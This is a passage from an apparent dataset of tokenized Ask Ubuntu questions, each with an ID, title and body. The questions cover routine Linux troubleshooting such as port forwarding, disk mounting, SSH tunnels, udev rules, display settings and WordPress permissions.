not that it contains anything of value , but once we start making progress on the app we would n't want our intellectual property stolen . should i be worried ? and what can i do about it ? edit : i found some very useful information here and this allowed me to run a script that splits and sorts all the invalid passwords and invalid users that tried to log in . may come in handy to someone who ended up here through google !
447780	opening ports wo n't work ?	so i have internet connection sharing set up and i 'm getting wifi on 1 computer , and sending it through ethernet to the other , and i 'm trying to run a server on the one without wifi . that would work i think right ? i opened my ports on my router and it looked all well and good but my friends ca n't connect to my server and port checker sites display my ports as closed . i tried doing dmz and it still showed as closed . any words of advice would be appreciated . thank you . edit : yeah i 'm just trying to get any type of port forwarding working . right now i ca n't figure it out . i 'm opening ports on the host computer providing the wifi and i 'm getting nothing .
447781	how to create a keybord shortcut for toggling mouse touchpad ?	i am trying to create a keyboard shortcut for [ enabling ] or [ disabling ] my mouse-pad , since it is very annoying to have it while typing especially when you have a mouse . i have tried with xinput command : xinput set-prop < id > `` device enabled '' 0 this has not worked for me , also i have tried nearly everything in other answers , but most of them are for older versions and do n't work on 13.10 . i am pretty new to ubuntu , so please explain even if its something stupid can anyone please help and thanks in advance .
447783	windows 8 and ubuntu os installation possible on the same computer ?	i have a simple question : `` if i install ubuntu 13.10 on my windows 8 pc and lets say i need/want to go back to windows 8 , could i use recovery discs to remove ubuntu and simply reinstall windows '' ? also i really would like to play my steam games on ubuntu , but they are all windows games , so is there any way i could install windows steam games on ubuntu 13.10 ? i 'd rather not have to dual-boot and switch between os platforms to just play my games . specs : hp pavilion g6 4gb ram ( soon to be 8gb ) amd graphics card
447788	why apache2 service does n't work ?	i am trying to install apache2 web server on ubuntu 10.10 as a beginner , but i do n't have access to the repositories in the application center . so i try to download the source package of apache2 and install it . i downloaded the package from http : //packages.ubuntu.com/source/precise/apache2 and install it using $ ./configure -- prefix=/usr/local/apache2 $ make $ make install and i did n't get any error . when i type http : //localhost.com in my browser i get it works ! but when i want to use apache2 service it says unrecognized service and the /etc/init.d/apache2 does n't exist , too .
447791	can not access internal hdd error mounting /dev/sdb2 ( ntfs signature is missing )	i just installed ubuntu 13.10 . my pc cpu amd a10-7700k apu with radeon ( tm ) r7 graphics × 4 motherboard gigabyte ga-f2a88xm-d3h ram 8gb have two internal hdd primary =128gb secondary 2tb just after installation , i quick formatted secondary with ntfs file system and i started copying files . when i rebooted the system , the 2nd hdd was split into 3 partitions only two showing and when i tried access i got the following message : unable to access “372 gb volume” error mounting /dev/sdb2 at /media/mihalis/2604497c1a110d84 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb2 '' `` /media/mihalis/2604497c1a110d84 '' ' exited with non-zero exit status 12 : ntfs signature is missing . failed to mount '/dev/sdb2 ' : invalid argument the device '/dev/sdb2 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? please give me some help , i am trying for the first time use ubuntu . i know nothing about .
447797	is there a way to install the ms windows version of msn ?	i am using ubuntu 14.04 ( trusty ) i need to install msn - the windows version of msn , but can only find amsn which is not what i need . is there a way to install windows 's msn ?
447800	how do you transfer quickly a link from your computer to an android smart phone	i need a way to transfer links quickly in order to open them from my android terminal . any ideas ? note it 's not about files , it 's just links and i 'm looking for a manner to do it properly , easily and quickly . it could be preferably through internet . but other possibilities would be through : phone network , bluetooth , lan ( wi-fi ) or qr code .
447805	aliases in synapse	is there any way to add aliases / change items ' priority in synapse ? for example , i want it to oper firefox and not libreoffice when i type ff < return > . another example is that i want to open final term instead of plain terminal or terminator when i search for term , yet i still want both apps on my computer since final term is a bit shaky .
447808	previous file in ubuntu one	i have a huge problem . i accidentally sync broken files to ubuntu one . is there a way to get previous file ( that are not broken ) from ubuntu one ?
447812	does the radeon hd 8570m work with ubuntu ( saucy/trusty ) ? ( no hybrid )	i 'm planning to buy a new computer . it uses a amd a8 processor with a radeon hd 8570m . i 've read lots of discussions on how to get this card work using ubuntu or mint . however , all of them were talking about usage of the hd 8570m as an additional graphics card and a intel hd 4000 chip working as hybrid . now this device just uses the hd 8570m . does anyone of you have experience with this or knows where to find help ? thanks in advance computer model : hp probook 455 g1 ( cpu : amd a8-4500m ) got a suse installed but i want a free ( means $ 0 , not the `` free-kind of free '' ) os and want to keep on using ubuntu or linux mint .
447814	skype install deleted folders	i removed folders accidently from skype manually , now if im trying to install by sudo apt-get install skype it is actually installing but i dont have an icon to run it any ideas ?
447817	how to display google chrome menu in unity global menu	is there a way to display the google chrome menu in the unity global menu ? for example , firefox can do it through firefox-globalmenu . is there a package google-chrome-globalmenu ? i 'm using ubuntu 13.10 .
447819	partitioning an external hard drive for linux	i want to partition an external ssd hard drive ( 30gb ) for ubuntu . what is the proper size for main partition , swap partition and for the rest ? i want to use remaining disk space to store files , so this also should have proper filesystem . how to make this with gparted ?
447820	ssh -l ( error : bind : address already in use )	pretty simple , i know that this has happened to me before . could n't find a good answer on au . i was running an ssh session with ports bound : ssh -l 3000 : < server_name > :22 i just lost my connection . when i try to reconnect using the same command , i get the following error : bind : address already in use channel_setup_fwd_listener : can not listen to port : 3000 how do i reset ssh on my machine to allow the port to be bound again ? resetting the local machine works .
447823	ubuntu 12.04 skype problem with autio playback	for what ever strange reason i cant get skype to work.i got it installed but when i go to call someone it says problem with audio playback .my speakers seem to work fine i can watch youtube videos and listen to music .anyone can help ?
447836	dell e5520 upgrade to 12.10 & 13.10 no wifi	lspci 02:00.0 network controller : broadcom corporation bcm43228 802.11a/b/g/n i have performed all steps of the url and wifi works , but disappears when restarting laptop the wifi disapear and not work . https : //www.google.es/url ? sa=t & rct=j & q= & esrc=s & source=web & cd=1 & cad=rja & uact=8 & ved=0cc0qfjaa & url=https % 3a % 2f % 2fzoni.nl % 2fposts % 2f2013 % 2f11 % 2f09 % 2ffixing-the-broadcom-bcm4331-wireless-drivers-on-ubuntu-1310 % 2f & ei=vwzmu7-iduhi0wxlz4hgaq & usg=afqjcnhhdxs_zqbxqpj9jvl2ki88uvxf6q & sig2=vwcesjeu0_9zfynfkwevkw & bvm=bv.64542518 , d.d2k regards
447838	is there any kind of relationship between windows and ubuntu installation ?	i 've just experienced incredibly weird behavior in ubuntu . i 've written lately some questions here regarding my shitty tablet not working correctly in ubuntu 13.10 . i 've left it that way having it without pressure sensitivity other stuff works and in windows it just works , so i gave up on fixing that . but just moments ago i accidentally damaged my windows installation and it would n't boot . so to figure out how to fix it i 've booted into ubuntu to do some google searching to get my windows 8 installation fixed . and as i tried to use my tablet instead of the mouse i 've noticed it did n't move , but in xinput it reports that there is pressure sensitivity . so i thought to myself ok , maybe some accidental progress . i 'll take a look into that later once i fix my windows because i need it . so had a couple restarts as i was trying to get to boot menu of windows to do some recovery and from time to time i 've gotten to ubuntu to look for more clues and the tablet is always not moving my cursor but has pressure sensitivity.. i 've recovered windows from a restore point and checked that it works as it should . and then i 'm going to ubuntu to see what can i do to that tablet to maybe finally get it working somehow . but guess what , i boot into ubuntu and the tablet again works as it was previously , the cursor moves but no pressure sensitivity . now do n't tell me this is some kind of accident . i 've never seen any change to tablet behavior before windows got broken and i 've been at least 5-6 times to ubuntu while windows was not working ( tablet behavior was different and always the same as it changed after windows got broken ) and once i fixed windows from that moment , the tablet is again as it was before . what is this supposed to mean ? this is just too weird for me .
447841	installing ubuntu 12.04.4 lts on samsung series 5	i want to install ubuntu linux 12.04.4 lts on my samsung np300-e5x-s02in laptop but i have heard a lot about the bricking problems in samsung laptops ( probably because of problems in uefi boot system ) . i already have windows 7 installed but i also want to install ubuntu alongside . could you tell me the safest possible method to install ubuntu along with windows ? i have some knowledge about the installation process .
447847	wpa_gui only works as root	wpa_gui will only work if i run it as root . i know i need to change its permissions but i can not figure out where or to what . i have tried adding the user to the netdev group but that did not work . any ideas would be extremely appreciated . thanks edit : my /etc/dbus-1/system.d/wpa_supplicant.conf < ! doctype busconfig public `` -//freedesktop//dtd d-bus bus configuration 1.0//en '' `` http : //www.freedesktop.org/standards/dbus/1.0/busconfig.dtd '' > < busconfig > < policy user= '' root '' > < allow own= '' fi.epitest.hostap.wpasupplicant '' / > < allow send_destination= '' fi.epitest.hostap.wpasupplicant '' / > < allow send_interface= '' fi.epitest.hostap.wpasupplicant '' / > < allow own= '' fi.w1.wpa_supplicant1 '' / > < allow send_destination= '' fi.w1.wpa_supplicant1 '' / > < allow send_interface= '' fi.w1.wpa_supplicant1 '' / > < allow receive_sender= '' fi.w1.wpa_supplicant1 '' receive_type= '' signal '' / > < /policy > < policy group= '' netdev '' > < allow send_destination= '' fi.epitest.hostap.wpasupplicant '' / > < allow send_interface= '' fi.epitest.hostap.wpasupplicant '' / > < allow send_destination= '' fi.w1.wpa_supplicant1 '' / > < allow send_interface= '' fi.w1.wpa_supplicant1 '' / > < allow receive_sender= '' fi.w1.wpa_supplicant1 '' receive_type= '' signal '' / > < /policy > < policy context= '' default '' > < deny own= '' fi.epitest.hostap.wpasupplicant '' / > < deny send_destination= '' fi.epitest.hostap.wpasupplicant '' / > < deny send_interface= '' fi.epitest.hostap.wpasupplicant '' / > < deny own= '' fi.w1.wpa_supplicant1 '' / > < deny send_destination= '' fi.w1.wpa_supplicant1 '' / > < deny send_interface= '' fi.w1.wpa_supplicant1 '' / > < deny receive_sender= '' fi.w1.wpa_supplicant1 '' receive_type= '' signal '' / > < /policy > < /busconfig > and the read out from command group armtc adm cdrom sudo dip plugdev lpadmin netdev sambashare it looks that both reference the group netdev but still no joy . edit2 : /usr/share/dbus-1/system-services/fi.epitest.hostap.wpasupplicant.service & /usr/share/dbus-1/system-services/fi.epitest.hostap.wpasupplicant1.service [ d-bus service ] name=fi.epitest.hostap.wpasupplicant exec=/sbin/wpa_supplicant -b -p /run/sendsigs.omit.d/wpasupplicant.pid -u -s -o /var/run/wpa_supplicant user=root systemdservice=wpa_supplicant.service
447849	opencv error in setting resolution with c910	i 've been trying to use opencv to control my webcam ( logitech c910 ) through python . i 've managed to capture images through .read ( ) but they are 640 x 480 and i have n't managed to set the resolution to the max which is 2592 x 1944 . i used to have opencv 2.4.8 but now i have 3.0.0-dev here is the code i try and the outputs : in [ 1 ] : import cv2 in [ 2 ] : cap = cv2.videocapture ( 1 ) highgui error : v4l/v4l2 : vidioc_s_crop in [ 3 ] : cap.open ( 1 ) highgui error : v4l2 : pixel format of incoming image is unsupported by opencv out [ 3 ] : true in [ 4 ] : r , f = cap.read ( ) vidioc_streamon : bad file descriptor in [ 5 ] : r out [ 5 ] : false i installed 3.0.0-dev following the instructions from this other question i posted . how to install opencv 2.9 for python ? the reason i went with the dev version is because in this post someone said that resolved their problem . http : //answers.opencv.org/question/2061/how-to-set-resolution-of-video-capture-in-python/
447853	awk scripting help	hey guys new to scripting and looking to see why i get the following error message : syntax error near unexpected token ' $ 0' using this .sh file to rearrange date and time in a .txt file so that certain characters are deleted . i have a awk.sh file that contains : match ( $ 0 /\ [ ( 0-9 ] + ) \/ ( [ a-z ] [ a-z ] + ) \/ ( [ 0-9 ] + ) ( [ 0-9 ] + : [ 0-9 ] + : [ 0-9 ] ) \+ [ 0-9 ] +\ ] matches ) printf ( `` 20 % s 10 % s 10 % s 10 % s\n '' , matches [ 1 ] , matches [ 2 ] , matches [ 3 ] , matches [ 4 ] ) just not sure why i get this message log.txt file contains : hello.googlebot.com - [ 10/december/2012:04:14:15 +0100 ] `` get /plain.txt http/1.0 '' 132 12 `` - '' `` googlebot/2.1 ( +http : //www.google.com/bot.html ) '' so what i 'm trying to do is display the 2nd column ( date and time ) in the .txt file as : 10 december 2012 04:14:15 not as shown above , so pretty much get rid of the forward slashes , the colon in between the date and time and also remove the +0100 ] do n't know what i 'm doing wrong
447856	how to run blackberry desktop software ?	i need blackberry desktop software because my pics are encrypted and my computer ca n't read them , and looks like that program is the only way to decrypt them . but i ca n't execute the program on wine . for example i try to update and [ pol_system_checkfs ] message : checking filesystem for /home/xxxxxx/.win/dosdevices/c : /program files/research in motion/blackberry desktop/rim.desktop.autoupdate.exe [ pol_wine ] message : running wine- /home/xxxxxx/.wine/dosdevices/c : /program files/research in motion/blackberry desktop/rim.desktop.autoupdate.exe [ pol_wine ] message : notice : playonlinux deliberately disables winemenubuilder . see http : //www.playonlinux.com/fr/page-26-winemenubuilder.html the entry point method could not be loaded [ pol_wine ] error : wine seems to have crashed if your program is running , just ignore this message [ pol_wine ] message : wine return : 1 fixme : mscoree : configfilehandler_startelement unknown element l '' configsections '' in state 1 fixme : mscoree : configfilehandler_startelement unknown element l '' section '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' log4net '' in state 1 fixme : mscoree : configfilehandler_startelement unknown element l '' appender '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' file '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' appendtofile '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' maximumfilesize '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' maxsizerollbackups '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' rollingstyle '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' datepattern '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' layout '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' header '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' conversionpattern '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' logger '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' level '' in state 3 fixme : mscoree : configfilehandler_startelement unknown element l '' appender-ref '' in state 3 please i need help . just tell me if i need to post more information .
447858	battery consume	i know this is a frequently asked question . after trying win 8.1 and latest opensuse i feel ubuntu 13.10 to consume much power . lenovo b590 notebook with 1tb 5200rpm hdd , 8 gigs of ram , i5 2.5ghz turbo 3.2ghz , hd4000 . with 64bit edition . i have built and installed latest powertop , changes are permanent , installed 01.org latest graphics drivers , latest updates . that helped me to get additional half hour . from 1h 30min to 2hours . and i have still 1 hour less time from less usage than on opensuse and win8.1 . on both os i can browse facebook , listen song in hd on youtube , develop with netbeans , check my emails with ondemand governor ( on windows balanced ) for 3 hours ~ 3h 15 minutes . or watch 2 hours of full hd movie in vlc . on ubuntu i have 2 hours and 14 minutes for playing music in rhythm box browsing facebook and writing this question . or watch about 1 hour 15 minutes of full hd movie . powertop reports in this moment 12.5w discharge ( powersave governor ) . most consuming apps is pulseaudio , rhythm box , chromium browser , sometimes device back-light ( set to 75 % , back-light levels fixed in grub ) , ksysguard repors 4-13 % cpu usage . unnecessary services disabled on startup . from cooler i am getting freeze air , so its probably not overheat issue , like with amd and wrong drivers . this always happens with me only on ubuntu distros like xubuntu or lubuntu or linux mint ( it was a bit better in battery management ) . love you for help , i know there is some solutions not listed above , please help me .
447859	`` all boot options are tried '' after installation on samsung ativ book 9 lite	hi i have the samsung ativ book 9 lite i just installed ubuntu 13.10 after removing windows 8.1 and have gotten the error all boot options are tried , after the installation after having a look around the forum ihave made sure that i have disabled secure boot and fast boot however i think the problem may be that i have been unable to disable the framebuffer . i am getting no f6 option when i am trying to install ubuntu that will allow me to select nomodeset . i am a bit of a noob and do not understand what the grub prompt way is ? is there any way i can fix the error : `` all boot options are tried press key to recover ... `` i would be extremely appreciative if you could give me a detailed answer . thanks and looking forward .
447860	imports for executing system commands ?	qml at the moment lacks the ability to execute basic system commands . what libraries or functions can be imported to add this functionality to a .qml file ?
447865	start of lubuntu from disk	i can not start lubuntu from a disk , only choose the language . how can i make the `` live session '' working as it is shown in f3 ? ( i am rather a newcomer in pcs , until now only windows xp ) sunagolden
447866	how can i make ubuntu ( preferably gnome desktop ) be 3d ?	by 3d i mean anaglyph 3d with 3d glasses like the red and blue ones . i 've seen some ways to do this but they are at least two years old . i 'm using ubuntu gnome 14.04 . i 'm using nvidia 330m , but by all means post even if the graphics card needs to be more powerful still ( i 'm getting a better computer soon ) . old methods : http : //ubuntuforums.org/showthread.php ? t=1123784 http : //www.warp1337.com/content/ubuntu-3d-stereo-you-need-diy-stereo-glasses http : //samiux.blogspot.com/2010/02/howto-real-3d-desktop-on-ubuntu-910.html i 'd like to be able to do this on gnome , but if it 's for unity that 's fine . even better if it 's universal for all desktop environments .
447870	program to balance speaker output for surround sound 2.1 ?	i do n't know how to tune speakers well , so i wanted to know if there is a program that will create a balanced sound output when connected to my 2.1 system for all sounds . using macbook pro 2010 15 inch .
447872	udev - how to change device group ?	by default , all hard drive and usb drive devices belong to group `` disk '' . i want to change usb drives to group `` adm '' . i verified the id_bus $ udevadm info -q all -n /dev/sdb | grep id_bus e : id_bus=usb i created the file /etc/udev/rules.d/70-persistent-usb.rules and insert the following # enable admin controls on all usb devices . id_bus== '' usb '' , group= '' adm '' lastly , i disconnected my usb drive and reconnected it . it is still showing $ ll /dev/sdb brw-rw -- -- 1 root disk 8 , 16 apr 14 19:31 /dev/sdb the drive group is not `` adm '' ? what am i doing wrong ?
447873	where is my windows partition ?	i just installed ubuntu from a dvd . i gave direction when asked by the installation program , it should put ubuntu in a separate partition and keep my windowsxp os in its own partition . now i do n't see how to get back to windows . when i reboot , i do n't get a choice of which partition to log on to . how do i get back to windows ?
447876	unity engine problem : help with animator has not been initialized error ( mecanim )	i 'm having an issue with the animator in unity , whenever i try to call any function that belongs to the animator class i am getting the notorious animator is not initialized warning . i have tried most if not all the solutions suggested in other threads but to no avail . i have had this problem for awhile and its never been an issue before , but now its causing weird interactions with the animator so its something i need to fix . on top of that , the animator is inconsistent , most of the animations play but i get inconsistent performance when interacting with the animator through code , which is what i have to do in order to make them play . please take a look at the code : http : //answers.unity3d.com/questions/685810/issue-with-animator-not-initlized.html please give us a hand , if you can tell us some solutions . if you 'd like to contact me more in depth ( if you ca n't work with what you have now ) just email me at : hellagamesentertainment @ gmail.com . thanks , please give us a hand in finding the solution to this problem !
447877	how to resolve the dns locally when there is a proxy configured ?	if i configure the proxy , under settings - > network - > proxy , and then try to access `` http : //google.com '' , the name resolution ( ip of google.com ) will happen there , at the proxy server but ... how can i change this behavior ? i mean , i need to resolve the dns locally at my desktop , before hitting the proxy . but why ? this way , i 'll configure `` ignore-hosts with lots of subnets ( ipv4 / ipv6 ) , that do n't need the proxy to reach them '' , then , ubuntu first needs to : 1- resolve the dns locally ( i.e . not via proxy too ) ; 2- try to match the locally discovered website ip with `` ignore-hosts '' settings ; is it possible ? tks ! thiago
447878	what 's the best way to reinstall ubuntu on a partition already used for ubuntu , but seemingly empty ?	on my dual boot computer ( xp/ubuntu ) with a 500gb drive , i recently had someone remove a virus from windows xp . although i asked him to leave the ubuntu partition as it is , the partition seems still to be there , but is not available any more . disk check sais the partition is `` healthy '' , and calls it a logical drive . i 'd like to keep ubuntu ; i found it very useful besides the fact that i obviously will have to stop using xp . my questions are : would a new installation install into the current ubuntu partition ? should i proceed as if it 's a normal installation ? would it be possible to run a normal installation and leave xp there as before , or should i upgrade xp to 7 first ? im sure these are basic questions , but i am a relatively inexperienced . thank you
447879	ca n't set custom resolution with tv and gt610 , xrandr and nvidia woes !	so , i 've looked around , and i know nothing about xrandr and the lot . i thought i had my display fixed , but it kinda ... pans , or scrolls , when i move my mouse to the edge of my display ... anyone know of a decent fix ? edit : sorry about my lack of info . i typed that a little too late in the night for my brain . to specify , i 'm on 14.04 , and i just did a fresh install . i thought that i had everything ready by setting an underscan , but apparently that did n't help , as when i moved my mouse to the edges , the display got wonky and scrolled around . so , i reverted . my main issue here is that when the display is at 1920x1080 , the screen extends beyond the borders ... i need to change the resolution to 1776x1000 , but when i try this using cvt and xrandr , it complains about not having the mode , even when i do newmode and addmode .
447882	disable lock screensaver	the latest update for 14.04 changed the lock screen behaviour . for a while during development of 14.04 , the lock screen would not run the screensaver - just lock the screen . the following links to someone who did not like this behaviour : how can i lock and blank the screen from the keyboard in 14.04 ? i 'm one of the weridos who did like the new behaviour . how do i change it back ? ( p.s this was closed as off-topic a few days ago because 14.04 was not officially released . now that it has been i 'm assuming that it 's ok to re-open this question ) .
447884	difference between `` removable drive hot-plugged '' and `` removable media inserted '' ?	on xubuntu 's `` removable drives and media '' settings , i see two items that can each be checked on/off that seem very similar . can someone explain what the difference is ? under the `` storage '' tab are [ ] mount removable drives when hot-plugged [ ] mount removable media when inserted the screenshot below shows them ( see the checked ones ) : ( and , as an aside : why is there only `` browse removable media when inserted '' , but no `` browse removable drives when inserted '' ? )
447887	ca n't find binary file in path	folks . i 've extracted a tar file with a few binaries into /usr/local/arm/bin and setup my path to include this folder . when i try to run which : $ which arm-elf-gcc /usr/local/arm/bin/arm-elf-gcc great ! but when i try to run the binary : $ arm-elf-gcc bash : /usr/local/arm/bin/arm-elf-gcc : no such file or directory that does n't make any sense to me . any idea on why this is happening ? these are the file permissions : -rwxr-xr-x 2 user user 139468 mar 6 2006 arm-elf-gcc i 'm on ubuntu 13.10 so there is no need for installing the ia32-libs for running 32 bits binaries .
447888	in filezilla two or more files are not able to open in netbeans	i have installed netbeans under my usr/share/ directory and i have set custom editor in filezilla . please anyone tell me how to set up netbeans as the default editor in ubuntu ?
447891	how to install unity 8 ?	i 'm using ubuntu 14.04 and found out that we can install unity 8 on it . will unity 8 replace unity 7 once i install it ? and if it does can i switch back to unity 7 if i want ? how would one go about it ?
447892	mouse and keyboard input stutter 13.10 only on ac power	i 'm using 13.10 on an asus n550jv . after resuming from suspend today , the mouse and keyboard stutter and freeze . i move the mouse around and it 's extremely choppy . if i 'm typing , suddenly characters are no longer being input to the screen . i have n't done anything interesting that could have caused this - i suspended while working and resumed when i got home and everything was terrible . i should emphasize , that it 's not lagging , but dropping the input . if i 'm typing and a `` stutter '' starts , during which i type 10 characters , those 10 characters are lost , they do n't appear when the `` stutter '' stops . so it 's not a problem with running too many programs on my cpu , or running out of memory or pulling from disk . it must be a problem with the hardware interface itself . sometimes the freeze happens after i press a key but before i release it , so the release event is never seen and it behaves as if i 'm holding the key down , repeating the character entered . the stuttering happens when i have no programs running , it happens when i 'm on the lightdm login screen . it happens on the virtual terminals ( tty1-6 ) . any ideas ? i 'm happy to provide more debugging information , versions , etc . but i do n't know what would be useful . a reboot does not fix the problem . i 've tried booting ubuntu 13.10 with the kernel parameters `` pci=noacpi '' but the keyboard and mouse are completely unresponsive then . i have to power off the machine with the power button to reboot . looking at powertop , i do n't have autosuspend enabled for any usb devices , but i do n't know if i can trust this . i tried for i in /sys/bus/usb/devices/*/power/autosuspend ; do echo -1 > $ i ; done which caused no change . wow , i 've never had a bug so suddenly make my computer completely unusable . update : i figured out this only happens when on ac power . if i unplug the power cord , the problem disappears . i still have no idea why this happens on ac power . update again : this is a manifestation of the bug discussed in this thread . i had plugged my android phone into this usb just to charge its battery , and it triggered the blinking battery light problem . my battery no longer charges on ac power . i 've had this problem before - it seems to be triggered by plugging any externally-powered device into the usb port by the minidisplay port on the asus n550jv . the hack fix listed in that link is reproduced here , but i 'm leaving this open since the problem is not really solved . 1 . remove the t5 torx screws from the bottom to access the battery . 2 . remove the battery . 3 . plug in the ac power and turn on the laptop . 4 . shutdown the laptop and put the battery pack back in and you are good to go . alternative hack fix - turn off the machine and unplug the ac . reset the battery by powering off the computer with the power button , but hold down the power button for 5-10 seconds after the computer shuts off . the battery light will be dark the whole time , but after booting again , the problem is resolved . source
447894	qml : what does i18n.tr ( `` blah blah blah '' ) mean ?	specifically , what is i18n.tr short for ?
447896	what does this mean `` 80/tcp filtered http ''	our linux server ( ubuntu ) stop listing on port 80. this is what i got : port state service 22/tcp open ssh 80/tcp filtered http what does this `` 80/tcp filtered http '' means ? what are the reasons for a port become open to filtered ? how could we open port 80 again ? we run a node.js web applicatoin on this server . we 've added port 80 on iptables but no help . iptables -a input -p tcp -- dport 80 -j accept
447897	can postfix 2.9.6 run in eth0:0 ?	i 'm using ubuntu 12.04 and postfix 2.9.6 . the goal is to run postfix in interface eth0:0 instead of eth0 . the idea is to be able to easily move postfix from a machine to another , moving the ip too and keeping intact the configuration . when i run postfix using the ip of eth0 ( 150.186.32.46 ) everything works fine . but if i try ip addr add 150.186.32.9/32 dev eth0 and the same config , but with the new ip , i get the following error : apr 13 06:36:16 iota postfix/qmgr [ 28834 ] : fatal : parameter inet_interfaces : no local interface found for 150.186.32.9 i could do that on redhat 4.7 and postfix-2.8.7 , but i 'm unable to do it in ubuntu . is there something i 'm missing ? thanks in advance .
447899	how to copy directory with wildcard to another folder	i need to make a cron that copy folder on /home here is the content of my /home fina f-logistik folder-surat-jalan zone-a zone-b zone-c zone-free what i need to copy is only folder that start with 'zone' i 've tried : cp /home/zone* /home.bak but return no such file or directory edit : and all of the list is folders edit # 2 : i use 12.04 precise..
447907	trying to download for usb installation , keep getting `` burn a cd '' version	i 've tried it twice now . i download the usb installer , following the web page at http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows , and get a good download . so after invoking the .iso file , the popup box says it 's for the windows disk image burner . since i 'm building on one system , for one that does n't have a cd/rom , this is n't very helpful ... where , oh where , have i gone wrong ? thanks wp
447908	wifi adapter help	i 'm trying to make the system recognize my usb wifi adapter . the adapter is a cisco wireless g-band i believe .
447910	ownership in lamp	i am relatively new to managing my own server but i am very eager to learn and right now i am able to install my own lamp stack on an ubuntu server 12.04 x64 . i am using wordpress as for my blog , now my problem is , everytime i install a plugin or theme or just upgrade the wordpress , my installation keeps on asking an ftp details , i searched that it is also possible to use ssh2 for this , i tried it though i failed . what i want to achieve here is to have a setup similar to web hosting that if i install a plugin or theme ftp will not be asked . i am aware that there is just a problem with the ownership , i already tried chown -r myuser : www-data /var/www/ and chown -hr myuser : www-data /var/www/ i also manually added my user to the www-data group , but still the problem persists . but if i do something like this chown -r www-data : www-data /var/www/ everything works just fine , however , if i am not mistaken this is not a good thing to do right ? or if i am wrong please enlighten me , i also assured that i chmod it to 755 . could anyone please help me to solve my problem ? how can i remove this annoying ftp details , i did not installed ftp on my server yet , i am using sftp to transfer my files . i would really appreciate any help , i need to remove this so that everytime a new wp update will be released my installation will automatically update since this is the newest wp feature since 3.8 . please point me to what i might missed , thank you very much . edit : i read and followed the post marked as answer , although i understand that it made my installation much secure , but it does n't solve my problem , after following the instructions i tried to install a plugin but still the ftp prompt appears . there are a lot of things i could n't do , even image resizing is not working because of the permissions . thank you
447911	how can i pipe the output of `` find '' to `` cd '' ?	what should i do to search for a file in list of folders and change current directory to the directory of the file ? i tried find -name script.py | cd but it did not work ( not that i was expecting it to ) . thanks for helping !
447912	installation of ubuntu 12	trying to install ubuntu 12 alongside win xp pro . get to final screen ( welcome ) and the installation just hangs at `` retrieving files 52 of 126 '' tried fresh copy of ubuntu - same result . do not have an internet connection during ( attempted ) install . would appreciate any advice/remedies thanks cplagarn
447918	how to edit ccsm manually in ubuntu 14.04	i 'm trying to built my own ubuntu 14.04 cd image with uck , i would like to know if is there a way to edit ccsm manually to change the `` minimize on click '' setting so when i build the image that change will be saved as default and therefore once that ubuntu image is installed on a computer the click on minimize will be default ...
447919	after messing with configuration files ca n't start ubuntu , get black screen	today i was trying to get tap to click to work on my acer c720 with only ubuntu installed . at one point i restarted the computer and i only got a black screen with a non-blinkning cursor in the top left . i do n't get a login screen and i ca n't change to tty1 or anything else once this happens . if i time pressing esc just right i can get to tty1 and from there i can login and switch to any workstation i want . from here i tried uninstalling and reinstalling unity but that did n't help . when i try launching unity from the tty1 i get a compiz ( core ) - fatal : could n't open display :0 . i deleted the xauthority file in my home folder and that did n't help . the only file that i think i changed was /usr/share/x11/xorg.conf.d/50-synaptics.conf .
447920	ubuntu stuck on purple loading screen , nvidia graphics card problem	my nvidia geforce gtx 750ti graphics card is why ubuntu will not boot . it hangs in the purple screen . i have 13.10 installed . how do i boot ubuntu with this nvidia card ?
447921	installing ubuntu with broken laptop monitor . external vga works , but not until windows loads drivers	i have a dell inspiron 1525 with a working copy of vista running on it . i want to install ubuntu desktop on it . the twist is this : the laptop monitor is broken . i can run a vga monitor , but it will not clone the screen until after windows activates . when i try to install the cd helper that comes with wubi , it errors out at the end and will not boot from cd . i 'm ok with destroying my windows installation from within windows so that the bios skips the hard drive and boots from cd , but i ca n't find how to do that either .
447923	ubuntu randomly freezes , where do i start	i have a compaq presario cq61 that was originally installed with windows 7 i have wiped the drive and had installed elementary luna , but the system soon began freezing . i wiped the drive again and installed ubuntu lts for its stability . the freezing issue when ubuntu manages to load locks me out completely with no keyboard or mouse access . i am assuming that the system is completely frozen , not just the inputs . kernel is 3.11.0-15-generic . minimal downloaded programs so far , mainly vlc , plex server and samba through the terminal . unfortunately i am extremely green with linux , i have tried looking around previously answered questions , but have not had any success . how can i go about fixing the freezing issues .
447925	can i secure a webpage with something other than username/password	i want to secure a webpage , but i want something better than username and password . is there any public key style authentication for a webpage ? i 'm not concerned with the usability / convenience of a solution . for clarity , i 'm not talking about ssl . i want the page contents blocked from someone without the `` key '' .
447926	is lubuntu daily build on 15-04-2014 = lubuntu 14.04	this question is in 2 parts 1st part my internet connection is slow ( 5kbps ) and i will download lubuntu 14.04 on another fast internet connection from my dad 's office . this week is full of holidays and the only working day is tomorrow ( 15-04-2014 ) . lubuntu 14.04 will release on 17-04-2014 which is a holiday in kerala , india . so , i would like to download 14.04 version tomorrow ( 15-04-2014 ) . so is the lubuntu daily build of the date 15-04-2014 equals to the lubuntu 14.04 version which releases on 17th april . some little changes on the 16th april version to the 17th day official version is not important . 2nd part also , if i download the .iso file of lubuntu 15th april version ( using fast internet ) and on 17th april using zsync , i download the latest version to the local file ( 15th april lubuntu ) on slow internet connection , will the changes that would be downloaded be too sized or less sized ?
